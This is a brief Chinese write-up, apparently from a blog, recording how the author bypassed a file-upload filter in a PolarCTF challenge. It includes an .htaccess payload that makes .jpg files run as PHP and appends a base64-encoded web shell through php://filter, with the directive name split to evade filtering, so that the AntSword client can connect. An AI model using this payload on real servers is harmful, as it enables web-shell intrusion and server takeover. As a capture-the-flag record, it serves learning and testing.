记录一种文件上传的绕过方法

刷polarctf遇到的一道题目。

考虑使用 .htaccess 触发解析执行。但是传入的jpg文件不能有<?，使用<script language="php">php代码</script>上传成功后也不能蚁剑连接。原因应该是php7以上的版本，不能这么使用php标签头。

使用的方法是修改.htaccess配置文件，以用后门读取base64

.htaccess文件：
AddType application/x-httpd-php .jpg
php_value auto_append_fi\
le "php://filter/convert.base64-decode/resource=shell.jpg"

之后再上传图片码就可以正常连接。